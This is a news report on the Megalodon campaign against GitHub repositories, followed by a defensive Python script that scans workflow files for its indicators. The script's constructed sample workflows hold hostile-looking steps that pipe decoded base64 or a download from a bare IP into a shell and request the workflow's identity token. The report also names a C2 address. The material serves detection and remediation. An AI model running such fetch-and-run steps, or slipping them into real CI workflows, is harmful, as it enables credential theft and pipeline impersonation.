Cybersecurity firm SafeDep has discovered a large automated attack on the code-hosting platform GitHub that targeted 5,561 repositories. Named Megalodon, the campaign pushed 5,718 malicious commits in a six-hour window on 18 May 2026. SafeDep spotted it with its scanning tool, Malysis, which flagged malicious scripts hidden inside otherwise clean-looking files.
The attackers used throwaway GitHub accounts with random eight-character usernames to cover their tracks, and set their git commit identities to look like automated CI services, using author names such as build-bot, auto-ci, ci-bot and pipeline-bot.
The attack came around the same time the TeamPCP hackers announced they had compromised a GitHub employee's device and breached 3,800 repositories through a malicious VS Code extension, a reminder that developers themselves are being actively targeted.
Hidden Backdoors in System Files
According to SafeDep's blog post, the attackers used two workflow-injection techniques. The first, which SafeDep calls SysDiag, is the broad, noisier variant: it adds a new GitHub Actions workflow file at .github/workflows/ci.yml that runs a credential-stealing script every time a developer pushes changes to the project.
The second, called Optimize-Build, is stealthier. It overwrites existing workflow files and uses the workflow_dispatch trigger, so the malicious job does not run on ordinary pushes: no builds fail and no red flags appear. The attackers can wake the backdoor at any time by dispatching the workflow through the GitHub API.
The popular live-chat and chatbot service Tiledesk was a major victim of the attack. Attackers reportedly compromised nine of Tiledesk's GitHub repositories, and because the maintainer did not realise the code had been poisoned, they unknowingly published seven infected versions of the product's server package, @tiledesk/tiledesk-server (versions 2.18.6 through 2.18.12), to the public npm registry between 19 and 21 May 2026.
A Hunt for Private Cloud Keys
Once triggered, the workflow spawns a shell that decodes and runs a 111-line script. The script gathers internal files and data from the build environment and sends them to an attacker-controlled command-and-control (C2) server at 216.126.225.129:8443.
The malware harvests credentials for the major cloud platforms (Amazon Web Services, Google Cloud and Microsoft Azure) and searches system logs, history files and source code for some 30 kinds of secrets, including passwords, database connection strings and private keys.
The most serious outcome, according to SafeDep, is the theft of the tokens that identify the workflow to other systems, which lets attackers "impersonate the GitHub Actions workflow." Cloud accounts that trust those tokens then treat the attackers' requests as if they came from the legitimate pipeline.
SafeDep urges developers who saw unexpected commits on 18 May from identities such as build-[email protected] or [email protected] to revert those changes and rotate every cloud credential the repository's workflows could reach immediately.
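As a practical triage step for the two workflow shapes described above (the always-on ci.yml and the dormant workflow_dispatch backdoor), the following Python script is an added example, not SafeDep's Malysis and not code from the report. It scans workflow files for indicators such as base64-decoded text piped to a shell, downloads from a bare IP address, references to repository secrets next to such steps, and requests for the workflow's identity token; the assumption that the token theft goes through the GitHub-provided ACTIONS_ID_TOKEN_REQUEST_URL variable is the author's, not SafeDep's. The three sample workflows, the 203.0.113.10 address and the noreply.example domain are constructed for the example; only the bot author names come from the report.

```python
import re

# Constructed sample workflow files for this example; they are not samples from
# SafeDep's report. The first mimics the always-on shape (a ci.yml that runs a
# decoded script on every push), the second the dormant shape (workflow_dispatch
# only, downloading from a bare IP and requesting the workflow's identity token).
NOISY_WORKFLOW = """\
name: CI
on: [push, pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: System diagnostics
        run: echo "ZWNobyBoaQ==" | base64 -d | bash
"""

DORMANT_WORKFLOW = """\
name: Optimize Build
on:
  workflow_dispatch:
jobs:
  optimize:
    runs-on: ubuntu-latest
    steps:
      - name: Optimize
        env:
          AWS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
        run: |
          curl -s http://203.0.113.10:8443/payload | sh
          curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL"
"""

CLEAN_WORKFLOW = """\
name: Tests
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

# Step contents that have no business in a normal CI job.
EXEC_PATTERNS = {
    "base64-to-shell": re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b"),
    "raw-ip-download": re.compile(r"\b(curl|wget)\b.*https?://\d{1,3}(?:\.\d{1,3}){3}"),
    # Assumption: an OIDC identity token is fetched via the env vars GitHub exposes for it.
    "oidc-token-request": re.compile(r"ACTIONS_ID_TOKEN_REQUEST_(URL|TOKEN)"),
}
SECRETS_REF = re.compile(r"\$\{\{\s*secrets\.\w+\s*\}\}")

# Commit author names the report attributes to the campaign.
BOT_AUTHOR_NAMES = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}


def workflow_triggers(text):
    """Return the set of event names under the top-level 'on:' key.

    Handles 'on: push', 'on: [push, pull_request]' and the block form with
    one event per two-space-indented line. No YAML library is needed for this subset.
    """
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = re.match(r"^on:\s*(.*)$", line)
        if not m:
            continue
        inline = m.group(1).strip()
        if inline:
            return {t.strip() for t in inline.strip("[]").split(",") if t.strip()}
        triggers = set()
        for nxt in lines[i + 1:]:
            if nxt.strip() and not nxt.startswith(" "):
                break  # reached the next top-level key
            child = re.match(r"^  (\w+):", nxt)  # two-space indent = direct child of 'on'
            if child:
                triggers.add(child.group(1))
        return triggers
    return set()


def scan_workflow(text):
    """Return sorted finding tags for one workflow file ([] means nothing suspicious)."""
    findings = {tag for tag, pat in EXEC_PATTERNS.items() if pat.search(text)}
    if findings and SECRETS_REF.search(text):
        findings.add("secrets-referenced")  # repository secrets exposed to the suspicious step
    if findings and workflow_triggers(text) == {"workflow_dispatch"}:
        # Never runs on a push, so it never breaks a build; it waits for an API dispatch.
        findings.add("dormant-trigger")
    return sorted(findings)


def suspicious_author(author_line):
    """True if a 'git log --format=%an <%ae>' line uses one of the campaign's bot names."""
    name = author_line.split("<", 1)[0].strip().lower()
    return name in BOT_AUTHOR_NAMES


if __name__ == "__main__":
    for label, wf in [("noisy", NOISY_WORKFLOW), ("dormant", DORMANT_WORKFLOW), ("clean", CLEAN_WORKFLOW)]:
        print(label, scan_workflow(wf))
    # Constructed log lines; the domain is a placeholder, not one from the report.
    for entry in ["build-bot <build-bot@noreply.example>", "Jane Doe <jane@example.org>"]:
        print(entry, "->", suspicious_author(entry))
```

Run scan_workflow over every file in .github/workflows/ of each repository and suspicious_author over the output of git log --since=2026-05-18 --until=2026-05-19 --format='%an <%ae>'. A dormant-trigger finding is the more dangerous one: the job may never have run, so also check whether it was ever dispatched (for example with gh run list --workflow <file> --event workflow_dispatch) before deciding which secrets to treat as exposed. Either way the remediation SafeDep gives applies: revert the commit and rotate the credentials the workflow could reach.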